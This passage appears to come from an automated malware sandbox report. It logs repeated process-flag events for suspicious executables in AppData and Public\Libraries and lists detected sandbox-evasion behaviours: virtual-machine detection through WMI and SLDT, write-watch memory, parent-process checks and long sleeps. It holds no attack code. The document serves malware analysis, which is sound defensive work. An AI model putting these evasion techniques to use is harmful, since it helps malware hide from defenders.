Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3D940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3DDE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3DD00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 25B80000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 25F70000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 27F70000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3D900000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3DD30000 memory reserve \| memory write watch
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Memory allocated: 3FD30000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 17_2_00007FFAABA20F6D sldt word ptr [eax]

17_2_00007FFAABA20F6D

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199809	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199687	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199305	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1199172	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197547	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197435	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197328	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197219	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197109	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1197000	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196880	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196766	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196652	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196544	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196403	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196229	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196124	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1196012	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195854	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195728	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195608	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195470	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195295	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1195143	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194979	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Thread delayed: delay time: 1194835	Jump to behavior
